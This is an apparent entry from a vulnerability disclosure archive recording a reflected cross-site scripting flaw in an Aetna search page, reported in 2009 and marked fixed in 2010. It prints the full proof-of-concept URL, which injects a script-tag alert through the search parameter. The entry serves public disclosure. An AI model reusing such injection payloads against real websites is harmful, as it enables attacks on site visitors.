Security researcher mckt, has submitted on 29/05/2009 a cross-site-scripting (XSS) vulnerability affecting searchx.aetna.com, which at the time of submission ranked 8260 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 18/07/2010. It is currently fixed. |
Date submitted: 29/05/2009 |
Date published: 18/07/2010 |
Date fixed: 03/08/2010 | Status: FIXED |
Author: mckt |
Domain: searchx.aetna.com |
Category: XSS |
Pagerank: 8260 |
URL: http://searchx.aetna.com/_layouts/search/default.aspx?k=a%22%3E%3Cscript%3Ealert(1337)%3C/script%3E& selectedIndex=0&s=int_www.aetna.com&pt=SDAV%3ahref%2cContains%2chttp%3a%2f%2fwww.aetna.com/news/%2cA nd%2c&wd=+where+%22URL%22+Contains+http%3a%2f%2fwww.aetna.com/news/&RefURL= |
Click here to view the mirror
|
|
|